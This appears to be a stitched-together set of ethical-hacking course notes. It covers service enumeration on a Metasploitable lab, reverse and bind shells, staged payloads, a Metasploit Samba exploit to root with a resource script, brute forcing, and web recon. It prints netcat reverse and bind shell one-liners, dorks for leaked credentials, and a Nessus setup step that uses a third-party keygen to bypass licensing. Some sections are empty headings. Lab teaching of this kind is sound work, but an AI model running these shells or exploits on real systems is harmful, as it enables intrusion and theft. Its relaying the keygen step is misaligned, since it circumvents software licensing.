Nmap done: 1 IP address (1 host up) scanned in 76.01 seconds
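The same check the http-methods script performs can be done by hand with a single OPTIONS request. The sketch below uses Python's standard http.client; the helper names are my own, not part of any tool:

```python
# Ask a web server which HTTP methods it advertises, the same information
# nmap's http-methods script reports. Helper names are illustrative.
import http.client

def parse_allow(header_value: str):
    """Split an Allow header value into a list of method names."""
    return [m.strip().upper() for m in header_value.split(",") if m.strip()]

def allowed_methods(host: str, port: int = 80):
    """Send OPTIONS / and return the methods listed in the Allow header."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    try:
        conn.request("OPTIONS", "/")
        resp = conn.getresponse()
        return parse_allow(resp.getheader("Allow") or "")
    finally:
        conn.close()

if __name__ == "__main__":
    print(allowed_methods("bytecapsuleit.com"))
```

If dangerous methods such as PUT, DELETE, or TRACE show up in the Allow header, that is worth investigating further during the assessment.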

26. EHP Enumerating HTTP and HTTPS Part 2

Enumerating HTTP and HTTPS Part 2


Brute force and hidden file finding

The victim machine will be Metasploitable 2

First check victim machine IP

command

>> ip address

To see service version

>> nmap -F -sV -T4 192.168.231.152

To find hidden file and directories

>> nmap -sV -p 80 --script http-enum 192.168.231.152

Let's check the /test/ Test page

Let's check the /doc/ files

Let's check the /phpMyAdmin/

We see the information. Now it's time to brute force. Here we will use Nikto and DirBuster.

What is Nikto

Nikto is an open-source web server scanner and vulnerability assessment tool designed to identify
potential security issues in web servers and web applications. It performs comprehensive tests
against web servers, checking for:

1. Outdated software: Nikto checks for outdated versions of web server software, including HTTP
servers, web applications, and other related components.

2. Configuration errors: The tool examines server configuration files and settings for potential
mistakes or security vulnerabilities.

3. Vulnerable files and programs: Nikto scans for known vulnerable files and programs, such as CGI
scripts, PHP files, and other executable code.

4. Server misconfigurations: It checks for incorrect or missing server settings, like HTTP headers,
index files, and server options.

5. SSL/TLS issues: Nikto can also scan for SSL/TLS certificate-related security issues, including cipher
suite weaknesses and certificate expiration dates.

Nikto’s output includes a detailed report listing the identified issues, along with recommendations for
remediation. This information helps security professionals, system administrators, and penetration
testers to:

• Identify and prioritize security vulnerabilities
• Remediate issues to improve web server security
• Conduct thorough security assessments and audits

Nikto is a command-line interface (CLI) tool, available for Linux, Windows, and macOS platforms. Its
flexibility and customizability make it a popular choice among security professionals and web
developers.

The -h option specifies the target web server's IP address or hostname to be scanned by Nikto.

command

>> nikto -h 192.168.231.152

What is DirBuster

DirBuster: A multi-threaded Java application designed to brute-force directory and file names on web/application servers. Its primary goal is to find hidden files and directories on web servers, often overlooked in default installations.

Here’s a breakdown of DirBuster’s features:

1. List-based brute force: DirBuster comes with 9 pre-generated lists of common directory and file
names, crawled from the internet and compiled based on actual usage by developers. This approach
makes it effective at finding hidden files and directories.

2. Pure brute force: Additionally, DirBuster offers a pure brute-force option, allowing users to specify
a custom wordlist or perform a blind brute-force attack.

3. Multi-threading: DirBuster utilizes multi-threading, enabling it to send multiple requests


concurrently and speed up the scanning process.

4. Options: Users can customize DirBuster’s behavior by specifying options such as:

• Target URL
• Wordlist (default or custom)
• GET or HEAD request method
• Thread count
• Start point of the scan
• Verbose output
• File extension filtering
• Recursive scanning
• Report file output

DirBuster is a powerful tool for web penetration testers and security researchers, helping them
discover hidden files and directories on web servers. Its effectiveness relies on the quality of its pre-generated lists and the user's ability to customize its behavior to suit their specific needs.

To start DirBuster

>> dirbuster

Target Url
http://192.168.231.152:80/

Go to

• click on (Browse)
• from Look in select (/)
• then select (usr)
• then select (share)
• then find (wordlists)
• then select (dirbuster)
• then choose as your need

Results - List View

Results - Tree View

27. EHP Enumerating SMB

Enumerating SMB
SMB stands for Server Message Block, a protocol used for sharing files, printers, and other resources
over a network. It's widely used in Windows environments but is also supported by other operating
systems like Linux and macOS.

Key Features of SMB:

1. File Sharing: Allows users to access, read, and write files on remote servers as if they were on the
local machine.

2. Printer Sharing: Enables shared access to printers over a network.

3. Network Browsing: Provides the ability to discover and access resources available on a network.

4. Authentication and Permissions: Ensures secure access by requiring users to authenticate and
restricting access based on permissions.

Common Uses:

• Accessing shared folders in office or home networks.


• Connecting to network-attached storage (NAS) devices.
• Enabling communication between Windows and non-Windows systems.

SMB Versions:

1. SMB 1.0: The original version, now outdated and considered insecure.
2. SMB 2.0: Introduced in Windows Vista and Server 2008, offering improved performance and
security.
3. SMB 3.0 and newer: Enhanced with encryption, performance improvements, and failover support.
Common in modern Windows systems.

Tools for Using SMB:

• Windows Explorer: Direct access via \\servername\sharename


• Linux: Use tools like smbclient or mount shares via cifs
• macOS: Connect via Finder with smb://

Metasploit framework

Metasploit is a powerful open-source penetration testing framework used to discover, exploit, and
validate vulnerabilities in systems. It provides tools for creating and executing exploit code, as well
as for simulating real-world attacks to test system security.

Key Features:

• Exploitation: Helps find and exploit vulnerabilities in networks and applications.
• Payloads: Delivers scripts (like Meterpreter) to interact with or control compromised systems.
• Modules: Includes exploits, auxiliary tools (e.g., for scanning), and post-exploitation tools.
• Automation: Enables scripting and repeatable testing processes.
• Community Contributions: Regularly updated with new exploits and features.

Metasploit is popular among ethical hackers, security researchers, and even malicious actors,
making it essential to learn for cybersecurity professionals.

Following the class

Start Metasploit framework

>> msfconsole

Now in msfconsole

msf6 > search smb

We need scanning

224 auxiliary/scanner/smb/smb_ms17_010

Now select auxiliary/scanner/smb/smb_ms17_010, which is number 224 in the list.

To select auxiliary/scanner/smb/smb_ms17_010

Command

msf6 > use 224

after selected it will look like the image below

msf6 auxiliary(scanner/smb/smb_ms17_010) >

To check what is in it

msf6 auxiliary(scanner/smb/smb_ms17_010) > info

Now set RHOSTS (Remote Host)

command

msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.231.152

Now check whether the remote host is vulnerable

command

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

We did not find any vulnerability here, so exit.

Now try smbclient to find vulnerability.

To start smbclient

command

>> smbclient

To see smbclient options

command

>> smbclient --help

To list the shares on the host

command

>> smbclient -L \\\\192.168.231.152\\

Here we will use IPC$ (any of the other listed shares could also be chosen).

After connecting, the help command shows what we can do here:


smb: \> help

28. EHP Enumerating SSH

Enumerating SSH
Secure Shell (SSH) is a cryptographic network protocol that enables secure remote access to and
management of computers, servers, and other network devices over an unsecured network. It
provides a secure connection by encrypting data and authenticating users, ensuring the
confidentiality and integrity of transmitted data.

Key Features:

• Encryption: SSH encrypts all data transmitted between the client and server, making it difficult
for unauthorized parties to intercept and read or modify the data.

• Authentication: SSH uses strong authentication mechanisms, such as public-key cryptography


and password authentication, to verify the identity of users and devices.

• Port forwarding: SSH allows for tunneling or port forwarding, enabling data packets to traverse
networks that would otherwise block them.

• Secure remote access: SSH enables administrators to access and manage remote devices,
servers, and networks securely, without exposing sensitive data to unauthorized parties.

Common Uses:

1. Remote server management


2. File transfer (securely replacing insecure protocols like FTP)
3. Network administration and maintenance
4. Secure access to cloud-based services and infrastructure

Port Number: SSH typically uses port 22, but this can be changed during configuration.
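A quick manual version of what an SSH version scanner does is simply to read the identification banner the server sends as soon as you connect. A minimal sketch (the helper name is my own):

```python
# Grab the SSH version banner: the same information the Metasploit
# ssh_version scanner reports. The helper name is illustrative.
import socket

def grab_ssh_banner(host: str, port: int = 22, timeout: float = 5.0) -> str:
    """Connect and return the server's identification line,
    e.g. 'SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1'."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        banner = s.recv(256).decode(errors="replace")
    return banner.strip()

if __name__ == "__main__":
    print(grab_ssh_banner("192.168.231.152"))
```

The banner reveals the protocol version and often the exact server software build, which can then be checked against known vulnerabilities.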

Enumerating SSH

First start Metasploit

>> msfconsole

In Metasploit, search for SSH auxiliary modules

msf > search type:auxiliary name:ssh

Here we will use this

Now select number 15

msf > use 15

Now we need to set RHOSTS. Before doing that, check the module details.

To check it

msf auxiliary(scanner/ssh/ssh_version) > info

Here RHOSTS is not set; RPORT is already set to 22.

Now set RHOSTS

msf auxiliary(scanner/ssh/ssh_version) > set RHOSTS 192.168.231.152

Now check the options

msf auxiliary(scanner/ssh/ssh_version) > show options

Now run the module to see the information we get

Video time 05:53

29. EHP Researching Potential Vulnerabilities

Researching Potential Vulnerabilities

Week 07

30. EHP Scanning with Nessus Part 1

Scanning with Nessus Part 1


Step-1
Download Nessus
https://www.tenable.com/downloads/nessus

Install it
>> dpkg -i Nessus-10.8.3-debian10_amd64.deb

Step-2
Go to for more info
https://github.com/harshdhamaniya/nessuskeygen

Step-3

Stop Nessus:
>> systemctl stop nessusd

>> git clone https://github.com/harshdhamaniya/nessuskeygen.git

>> cd nessuskeygen

>> python3 nessuslicense.py

Now choose the Nessus version as needed.

Copy the activation code and use it. (It will be valid for 5 days.)

Step-4
Updating the Nessus Key

To update the Nessus key, you can use the following commands:

>> nessuscli fix --reset-all (not needed on a first-time installation)
>> /opt/nessus/sbin/nessuscli fetch --register xxxx-xxxx-xxxx-xxxx

Replace xxxx-xxxx-xxxx-xxxx with your new Nessus Professional Key.

Step-5

Start Nessus:
>> systemctl start nessusd

- You can start Nessus Scanner by typing /bin/systemctl start nessusd.service


- Then go to https://kali:8834/ to configure your scanner

31. EHP Scanning with Nessus Part 2

Scanning with Nessus Part 2

32. EHP Reverse Shells vs Bind Shells

Reverse Shells vs Bind Shells


Reverse Shell

A reverse shell or connect-back is a setup, where the attacker must first start the server on his
machine, while the target machine will have to act as a client that connects to the server served by
the attacker. After the successful connection, the attacker can gain access to the shell of the target
computer.

To launch a Reverse shell, the attacker doesn’t need to know the IP address of the victim to access
the target computer.

Bind Shell

A bind shell is a sort of setup where remote consoles are established with other computers over the
network. In Bind shell, an attacker launches a service on the target computer, to which the attacker
can connect. In a bind shell, an attacker can connect to the target computer and execute commands
on the target computer. To launch a bind shell, the attacker must have the IP address of the victim to
access the target computer.

https://notes.anggipradana.com/tutorial/bind-vs-reverse-shell-concept
https://learntheshell.com/posts/bind-shells/
https://www.geeksforgeeks.org/difference-between-bind-shell-and-reverse-shell/

Key Takeaways:

• Reverse Shells are generally more stealthy and reliable for bypassing firewalls but require the
attacker to be ready and listening.

• Bind Shells are simpler but expose the target and depend on open inbound traffic, which is often
restricted by firewalls.

Difference Between Reverse Shell and Bind Shell

Definition
• Reverse Shell: The target machine (victim) initiates a connection back to the attacker's machine, granting remote access.
• Bind Shell: The target machine opens a listening service, and the attacker initiates a connection to it.

Connection Flow
• Reverse Shell: The target connects outbound to the attacker's machine, which is set to listen for incoming connections.
• Bind Shell: The attacker connects inbound to a port on which the target is listening.

Firewall Evasion
• Reverse Shell: More effective at bypassing firewalls, as firewalls typically allow outbound traffic (e.g., web traffic) while blocking unsolicited inbound traffic.
• Bind Shell: Less effective, since unsolicited inbound connections to the target are commonly blocked.

Use Cases
• Reverse Shell: Preferred when the target is behind a NAT or firewall, making direct inbound connections to the target impossible.
• Bind Shell: Usable when the attacker can reach the target directly over the network.

Setup
• Reverse Shell: The attacker runs a listener on their machine (e.g., nc -lvp <port>), and the target is instructed to connect back (e.g., nc <attacker-IP> <port> -e /bin/sh).
• Bind Shell: The target runs the listener (e.g., nc -lvp <port> -e /bin/sh), and the attacker connects to it (e.g., nc <target-IP> <port>).

Target Exposure
• Reverse Shell: Minimal, as the target does not leave an open port accessible to anyone; the connection is outbound to a specific attacker.
• Bind Shell: Higher, as the open listening port is reachable by anyone who can route to the target.

Network Visibility
• Reverse Shell: Often uses commonly allowed ports like 80 (HTTP) or 443 (HTTPS) to blend with normal outbound traffic, reducing suspicion.
• Bind Shell: A new listening port can stand out in port scans and network monitoring.

Security Concerns
• Reverse Shell: May fail if the target network restricts outbound connections or applies strict egress filtering.
• Bind Shell: May fail if inbound traffic to the target is filtered; the open port could also be discovered and used by third parties.

Examples
• Reverse Shell command (on target): nc <attacker-IP> <port> -e /bin/bash
• Bind Shell command (on target): nc -lvp <port> -e /bin/bash
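To see the direction of the connection concretely, here is a minimal Python listener playing the attacker's side of a reverse connection (the role normally played by nc -lvp 4444). It is a demonstration only, it just prints what the connecting client sends, and should be used only in a lab you own; the function name is illustrative:

```python
# Minimal "attacker side" listener for a reverse connection, the role
# normally played by `nc -lvp 4444`. Demonstration only: it just returns
# whatever the connecting client sends. Use only in a lab you own.
import socket

def listen_once(bind_addr: str = "0.0.0.0", port: int = 4444) -> bytes:
    """Wait for one inbound connection (the victim calling back) and
    return the first chunk of data it sends."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((bind_addr, port))
        srv.listen(1)
        conn, peer = srv.accept()      # the victim initiates: reverse direction
        with conn:
            data = conn.recv(1024)
    return data

if __name__ == "__main__":
    print(listen_once().decode(errors="replace"))
```

A bind shell reverses the roles: the listening code above would run on the target, and the attacker would use a plain client connection instead.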

33. EHP Staged vs Non-Staged Payloads

Staged vs Non-Staged Payloads


Staged Payloads: A payload that is divided into multiple stages, each serving a specific purpose.

Non-Staged Payloads: A payload that contains everything needed to establish a connection and
gain control, all in one package.

Comparison between Staged and Non-Staged payloads used in penetration testing, especially with
tools like Metasploit:

Definition
• Staged: A payload delivered in parts, where a small initial stager (stage 1) fetches a larger stage (stage 2).
• Non-Staged: The complete payload is delivered and executed in a single piece.

Delivery Mechanism
• Staged: The first stage connects back to the attacker to download and execute the second stage.
• Non-Staged: The full payload runs immediately; no second download is required.

Size
• Staged: Smaller initial payload size, since only the stager is sent at first.
• Non-Staged: Larger, since everything is bundled into one payload.

Network Activity
• Staged: Requires multiple network interactions: one to deliver the stager, then another to fetch the second stage.
• Non-Staged: A single transfer delivers everything.

Stealth
• Staged: Often more stealthy, as the small size of the stager can help avoid detection by security tools.
• Non-Staged: The larger payload is easier for security tools to flag.

Flexibility
• Staged: More flexible, as the second stage can be chosen based on the attacker's requirements.
• Non-Staged: Fixed at generation time.

Reliability
• Staged: Less reliable if the network connection is interrupted during second-stage delivery.
• Non-Staged: More reliable, since there is no dependency on a second transfer.

Examples
• Staged: Meterpreter staged payload (windows/meterpreter/reverse_tcp)
• Non-Staged: Meterpreter non-staged payload (windows/meterpreter_reverse_tcp)

Resource Efficiency
• Staged: Can be more efficient initially, especially on constrained targets, due to the smaller first stage.
• Non-Staged: Consumes more bandwidth and memory up front.

Use Cases
• Staged: Ideal for advanced attacks requiring flexibility.
• Non-Staged: Ideal for unreliable networks or when simplicity and reliability matter most.

Examples in Metasploit

Staged Payload:

Example: windows/meterpreter/reverse_tcp

Process:

1. Sends a small stager to the target.

2. The stager establishes a connection back to the attacker and downloads the larger stage (e.g.,
Meterpreter).

Non-Staged Payload:

Example: windows/meterpreter_reverse_tcp

Process:

The entire payload, including the reverse shell or Meterpreter, is sent at once and executed.

34. EHP Gaining Root with Metasploit

Gaining Root with Metasploit


Step-1

Scan the host first

>> nmap -sV -p 1-1024 192.168.231.152

Here we will target Samba (ports 139 and 445).

Now search for a Samba exploit with searchsploit. In this example we are working with Samba 3.0 on a Linux/Unix system:

>> searchsploit samba 3.0 unix

We can also search on Exploit DB (https://www.exploit-db.com/)

Now open the Metasploit Framework and search for the exploit:

>> msfconsole

>> search samba 3.0 username

We found an exploit ('Username map script') for Samba 3.0.

Now Select it

msf6 > use 0

Now check options

RHOSTS is not set. Now set it

>> set RHOSTS 192.168.231.152

Now exploit

msf6 exploit(multi/samba/usermap_script) > exploit

Now run some commands to confirm the exploit succeeded:

We got root access
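The interactive steps above can also be saved as a Metasploit resource script and replayed in one command. The module path is the one found above; the RHOSTS value is this lab's target IP:

```
# usermap.rc - replays the usermap_script exploitation steps
use exploit/multi/samba/usermap_script
set RHOSTS 192.168.231.152
exploit
```

Run it with:

>> msfconsole -r usermap.rc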

35. EHP Manual Exploitation

Manual Exploitation

36. EHP Brute Force Attacks

Brute Force Attacks

https://github.com/danielmiessler/SecLists
USER_FILE => /usr/share/seclists/Usernames/
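The mechanics behind tools like Hydra or Metasploit's login scanners can be sketched in plain shell: try each wordlist candidate against a verification check. Here a SHA-256 comparison stands in for a real login service, and the wordlist and password are invented for the demo:

```shell
#!/bin/sh
# Hash we "captured" earlier: SHA-256 of the (made-up) password "sunshine"
target_hash=$(printf '%s' "sunshine" | sha256sum | cut -d' ' -f1)

# Tiny inline wordlist standing in for SecLists / rockyou.txt
found=""
for candidate in password letmein dragon sunshine; do
    hash=$(printf '%s' "$candidate" | sha256sum | cut -d' ' -f1)
    if [ "$hash" = "$target_hash" ]; then
        found="$candidate"
        break
    fi
done
echo "cracked: $found"
```

In practice the check would be a network login attempt, and the wordlist would come from SecLists as shown above.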

37. EHP Credential Stuffing and Password Spraying

Credential Stuffing and Password Spraying
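Credential stuffing replays breached user:password pairs exactly as leaked, while password spraying tries one common password across many accounts to stay under lockout thresholds. A minimal sketch of the two loops (users, passwords, and the breach dump are all made up; a real attack targets a login endpoint):

```shell
#!/bin/sh
users="alice bob carol"
spray_password="Winter2024!"

# Password spraying: one password, many users (avoids per-account lockouts)
spray_attempts=$(for u in $users; do echo "try $u:$spray_password"; done)
echo "$spray_attempts"

# Credential stuffing: replay breached user:pass pairs exactly as leaked
breach_dump="alice:hunter2
bob:qwerty123"
stuff_attempts=$(printf '%s\n' "$breach_dump" | while IFS=: read -r u p; do
    echo "stuff $u:$p"
done)
echo "$stuff_attempts"
```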

Week 08

38. EHP Web Application Testing Methodology

Web Application Testing Methodology


https://medium.com/@zisansakibhaque/web-application-security-testing-method-5ed53ab7f168

Recon

1. Footprinting Website [ Recon with OSINT ]


2. Recon with Browser Addons [ Finding Technology, Service information ]
3. Google Dorking
4. Github Dorking
5. Port Scanning
6. Finding DNS Information
7. Whois Lookup
8. WAF Identification
9. Shodan Dorking

Enumeration

1. Check Security Header Info


2. Subdomain Enumeration
3. Filtering Live Domains
4. URL Extraction
5. Content Discovery
6. Finding Parameters
7. Sorting URLs

Vulnerability Scanning

1. Automation in Vulnerability Scanning


2. Scan Vulnerabilities manually through the testing methods of OWASP Top 10 Vulnerabilities
Category.
3. Analyze Vulnerability Databases.

Now Let’s Start to find out the Bugs in our Target Website

Step 01 —

Footprinting Website

First of all, let's footprint the target website using some well-known methods and techniques.

1. Finding the Target Website's IP through a website-to-IP lookup. [ Recommending https://www.nslookup.io/ ]

2. Getting an all-in-one "X-ray" overview of the Target Website [ Recommending https://web-check.as93.net/ ]

3. Finding the Geographical Location of the Target [ Tools — Google Earth, Google Maps, Wikimapia ]

4. Gathering information from Financial Services [ Tools — Google Finance, MSN Money, Yahoo!
Finance ]

5. Gathering Information from Business Profile Sites [ Tools — Crunchbase, opencorporates, corporationwiki ]

6. Monitoring the Target using Alerts [ Tools — Google Alerts, Twitter Alerts, Giga Alerts ]

7. Tracking the Online Reputation of the Target [ Tools — Mention, ReviewPush, Reputology ]

8. Gathering Information from Groups, Forums and Blogs

9. Gathering Information from Public Source Code Repositories [ Tools — Recon-ng ]

10. Footprinting through Social Networking Sites. [ Facebook, Twitter, Linkedin etc ]

11. Collecting Information through Social Engineering [ Collect information about the users and
employees interest , cookies, sensitive information ]

12. Analyze the Directory Structure of the Target Website [ Tools — Httrack ]

13. Find the Archive and Analyze previous data [ Tools — ViewDNS, https://web.archive.org ]

14. Extracting Metadata of Public Documents [ Tools — ExifTool, Web Data Extractor, Metagoofil ]

15. Extracting Words and Links from the Website [ Tools — CeWL ]

16. Email Footprinting [ Tools — Infoga, eMailTracker Pro ]

Step 02 —

Recon with Browser Addons

Now Let’s Recon our Target Website through some Browser Addons !!

1. Finding the Technology which are used to build our Target Website [ Tools — Wappalyzer,
BuiltWith ]

2. Detect the use of JavaScript libraries with known vulnerabilities [ Tools — Retire.js ]

3. Gather Information of Ports, Services and Server and Common Vulnerabilities [ Tools — Shodan ]

4. Test Web Applications [ Tools — KNOXSS, HackTools ]

Step 03—

Google Dorking

site:target.com -site:www.target.com

Online Resources:

— https://github.com/chr3st5an/Google-Dorking

— https://www.stationx.net/how-to-google-dork-a-specific-website/
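Dorks like the one above can be generated mechanically for any domain; a small sketch printing a starter set (example.com is a placeholder):

```shell
#!/bin/sh
domain="example.com"   # placeholder target

# Expand a domain into a few common dorks
dorks=$(cat <<EOF
site:$domain -site:www.$domain
site:$domain inurl:login
site:$domain filetype:pdf
site:$domain intitle:"index of"
EOF
)
echo "$dorks"
```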

Step 04 —

Github Dorking

What we can find on Github?

• FTP Credentials
• Secret Keys [API_key, Aws_secret key, etc.]
• Internal credentials [Employee credentials]
• API Endpoints
• Domain Patterns

Go to github and search


Eg.

- “target.com” “dev”
- “dev.target.com”
- “target.com” API_key
- “target.com” password
- “api.target.com”

More info about GitHub dorking: https://infosecwriteups.com/github-dork-553b7b84bcf4

Find more GitHub dorks at:

https://github.com/random-robbie/keywords/blob/master/keywords.txt
https://gist.github.com/jhaddix/77253cea49bf4bd4bfd5d384a37ce7a4

Some good write-ups about GitHub dorking/recon:

https://orwaatyat.medium.com/your-full-map-to-github-recon-and-leaks-exposure-860c37ca2c82

https://medium.com/hackernoon/developers-are-unknowingly-posting-their-credentials-online-caa7626a6f84

https://shahjerry33.medium.com/github-recon-its-really-deep-6553d6dfbb1f

Step 05—
Port Scanning

Now let's scan the ports of our target website with the tools below to find possible avenues of attack.

Tools in Scanning Ports —

1. Nmap [ https://www.stationx.net/nmap-cheat-sheet/ ]
2. UnicornScan [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
3. Angry IP Scanner [ https://0xsp.com/offensive/offensive-cheatsheet/ ]
4. Netcat [ https://0xsp.com/offensive/offensive-cheatsheet/ ]

Common Ports Cheat Sheet

Encrypted Ports

22: SSH/SCP
443: HTTP over SSL
465: SMTP over SSL
563: NNTP over SSL
636: LDAP over SSL
989-990: FTP over SSL
993: IMAP over SSL
995: POP3 over SSL
6679: IRC over SSL

Peer-to-Peer Ports

1214: Kazaa
4662: eMule
6346-6347: Gnutella
6881-6889: BitTorrent
6699: Napster

Gaming Ports

2302-2305: Halo
3074: Xbox Live
3724: World of Warcraft
6112: Battle.net
6500: Gamespy Arcade
27015: Half-Life
28960: Call of Duty

Streaming Ports

554: RTSP
1755: Microsoft Media Server
7070: RealAudio
8000: Internet Radio
8080: HTTP Proxy (often used for streaming)

Malicious Ports

1080: MyDoom
3127: MyDoom
4444: Sasser
8866: Bagle.B
9898: Dabber
9988: Rbot/Spybot
12345: NetBus
27374: Sub7
31337: Back Orifice

General Services

20-21: FTP
23: Telnet
25: SMTP
53: DNS
80: HTTP
110: POP3
143: IMAP
161-162: SNMP
389: LDAP
Step 06 —
Finding DNS Information

Tools in finding DNS Information —

1. Dig [ https://sid4hack.medium.com/decoding-dns-penetration-testers-journey-with-dig-7cb9845e6215 ]
2. DNS Lookup
3. MxToolbox
4. Nslookup
5. Viewdns

DNS footprinting helps determine the following records about the target DNS:

Record Type: Description

A: Points to a host's IP address
MX: Points to the domain's mail server
NS: Points to the host's name server
CNAME: Canonical name; allows aliases for a host
SOA: Indicates authority for a domain
SRV: Service records
PTR: Maps an IP address to a hostname
RP: Responsible person
HINFO: Host information record, including CPU type and OS
TXT: Unstructured text records

Step 07 —
Whois Lookup

Find out the Domain's Information by using a Whois Lookup. Link — https://www.whois.com/whois/

Step 08—
WAF Identification

In this step we need to identify whether our target website is protected by a WAF. We can use two different tools for the task:

Wafw00f [ https://github.com/EnableSecurity/wafw00f ]
WhatWaf [ https://github.com/Ekultek/WhatWaf ]

Step 09 —
Shodan Dorking

Shodan is a search engine for Internet-connected devices. It is different from search engines like

Google and Bing because those are great for finding websites, while Shodan helps in finding different things: popular versions of Microsoft IIS, control servers for malware, how many hosts are affected by new CVEs, which countries are becoming more connected, SSL certificates of websites, etc.

How to use the CLI-based version (basics)?

I would suggest following this tutorial: https://youtu.be/v2EdwgX72PQ?si=BedrWedKxxuy3cSk

Step 10 —
Check Security Header Info

HTTP Security Response Headers Cheat Sheet — https://cheatsheetseries.owasp.org/cheatsheets/HTTP_Headers_Cheat_Sheet.html
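A quick way to apply that cheat sheet: grep a server's response headers for the common security headers and report which are absent. The response below is a canned sample; in practice you would feed in the output of curl -sI:

```shell
#!/bin/sh
# In practice: headers=$(curl -sI https://target.example) -- sample used here
headers=$(cat <<'EOF'
HTTP/1.1 200 OK
Content-Type: text/html
Strict-Transport-Security: max-age=31536000
X-Content-Type-Options: nosniff
EOF
)

# Check for a few headers recommended by the OWASP cheat sheet
missing=""
for h in Strict-Transport-Security X-Frame-Options X-Content-Type-Options Content-Security-Policy; do
    if ! printf '%s\n' "$headers" | grep -qi "^$h:"; then
        missing="$missing $h"
    fi
done
echo "missing security headers:$missing"
```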

Step 11 —
Subdomain Enumeration

Let’s discuss the top 10 subdomain search tools that can help you discover subdomains.

1. Sublist3r [ Python tool that leverages multiple search engines to enumerate subdomains for a given domain. ]

2. Amass [ Open-source tool for passive reconnaissance that discovers subdomains, IP addresses, and other related information. ]

3. Subfinder [ Subdomain discovery tool that uses multiple sources, including search engines and certificate transparency logs. ]

4. Censys [ A search engine that provides access to a large and up-to-date database of internet hosts, including subdomains. ]

5. Assetnote [ A tool for asset discovery and monitoring, helping with subdomain identification and tracking changes over time. ]

6. Findomain [ Cross-platform subdomain enumerator that uses various sources to identify subdomains. ]

7. SecurityTrails [ Offers a comprehensive DNS database to discover subdomains, IP histories, and other related information. ]

8. Knockpy [ Python tool that uses multiple sources to gather subdomain information for a target domain. ]

9. DNSDumpster [ An online tool that provides DNS reconnaissance services, including subdomain discovery. ]

10. Aquatone [ A tool that helps visualize and gather information about domains, including subdomains, by combining techniques like screenshotting. ]

Step 12—
Filtering Live Domains

There is a tool called httpx, which is used to check whether subdomains are active or not. There are multiple ways to use it; we will look at the simplest one.

▶ Enumerate/Collect all subdomains using tools like subfinder, assetfinder, Knockpy and haktrails,
etc.

subfinder (https://www.youtube.com/watch?v=UT52zmdTMw0)

assetfinder (https://www.youtube.com/watch?v=YJ-nv758OSQ)

Knockpy (https://www.youtube.com/watch?v=FKhfZaYVO9I)

haktrails (https://www.youtube.com/watch?v=UT72WuKEQKM)

Run : subfinder -d someweb.com -o subf.txt -v

Run : echo "someweb.com" | haktrails subdomains > haksubs.txt

Run : assetfinder -subs-only someweb.com > asset.txt

▶ Combine the subdomains collected by the different tools into one file of unique entries, e.g. subdomains.txt

Run : cat subf.txt haksubs.txt asset.txt | sort -u > subdomains.txt

▶ Now check whether the identified subdomains are active:

Run : httpx -l subdomains.txt -o activesubs.txt -threads 200 -status-code -follow-redirects

▶ You'll see only the active subdomains, on which you can start hunting for bugs.

Another tool that automates this whole workflow is reconFTW.
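The merge-and-dedupe step can be verified locally with fabricated tool output:

```shell
#!/bin/sh
cd "$(mktemp -d)"

# Simulated output from subfinder / haktrails / assetfinder
printf 'a.example.com\nb.example.com\n' > subf.txt
printf 'b.example.com\nc.example.com\n' > haksubs.txt
printf 'a.example.com\nd.example.com\n' > asset.txt

# Merge all lists and keep only unique hosts
cat subf.txt haksubs.txt asset.txt | sort -u > subdomains.txt

echo "unique subdomains: $(wc -l < subdomains.txt)"
```

Six collected lines collapse to four unique hosts, which is exactly what sort -u buys you before feeding the list to httpx.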

Step 13—
URL Extraction

Here are some useful tools to perform this method —

Httpx
WaybackURLs

Step 14—
Content Discovery

Here are some useful tools to perform this method —

Httpx
Gobuster
Dirbuster

Step 15—
Finding Parameters

We are going to enumerate the web application to find hidden parameters of the target website.

Here are some useful tools to perform this method —

Arjun Tool
ParamSpider
WaybackURL
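What these tools ultimately produce is a list of parameter names pulled out of collected URLs; the extraction itself can be sketched with standard text tools (the URLs below are made up):

```shell
#!/bin/sh
# Sample URLs as a waybackurls/ParamSpider run might return
urls='https://example.com/search?q=test&page=2
https://example.com/item?id=7
https://example.com/about'

# Unique parameter names: strip up to "?", split on "&", keep name before "="
params=$(printf '%s\n' "$urls" \
    | grep '?' \
    | cut -d'?' -f2 \
    | tr '&' '\n' \
    | cut -d'=' -f1 \
    | sort -u)
echo "$params"
```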

Step 16—
Sorting URLs

GF tool is a powerful command-line utility that acts as a wrapper around the grep command,
providing additional functionality and convenience for searching and filtering text.

Link — https://github.com/tomnomnom/gf
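gf is essentially a library of saved grep patterns; the idea can be sketched with plain grep -E. The URLs and patterns below are simplified stand-ins for gf's real pattern files:

```shell
#!/bin/sh
# Sample URL list as collected during recon
urls='https://example.com/page?id=3
https://example.com/redirect?url=https://evil.example
https://example.com/static/app.js
https://example.com/search?q=hello'

# gf-style patterns: candidate parameters for SQLi and open-redirect testing
sqli=$(printf '%s\n' "$urls" | grep -E '\?(id|uid|item|cat)=')
redirect=$(printf '%s\n' "$urls" | grep -E '\?(url|next|redirect|dest)=')

echo "possible sqli:";     echo "$sqli"
echo "possible redirect:"; echo "$redirect"
```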

Step 17—
Automation in Vulnerability Scanning

1. Nessus — Nessus is a remote security scanning tool, which scans a computer and raises an alert
if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer
you have connected to a network.

Using Process — https://youtu.be/Gy-aPBb0djk?si=OsjRy9uiPXt_oTT6

2. Burpsuite — Burp Suite is an integrated platform/graphical tool for performing security testing of
web applications. Its various tools work seamlessly together to support the entire testing process,
from initial mapping and analysis of an application’s attack surface, through to finding and exploiting
security vulnerabilities.

Using Process — https://www.youtube.com/watch?v=hY_gzrTMn3U&list=PLwO5-rumi8A7TVRzfOD4OHabwJ0v1ZA81

3. ZAP — OWASP ZAP is a penetration testing tool that helps developers and security professionals
detect and find vulnerabilities in web applications.

Using Process — https://www.youtube.com/watch?v=bf2YuqgaeWo&list=PLH8n_ayg-60J9i3nsLybper-DR3zJw6Z5

4. Acunetix — Acunetix is an automated web application security testing tool that audits your web
applications by checking for vulnerabilities like SQL Injection, Cross-site scripting, and other
exploitable vulnerabilities.

Using Process — https://darkyolks.medium.com/vulnweb-lab-report-an-analysis-of-vulnerabilities-on-the-web-c33472761913

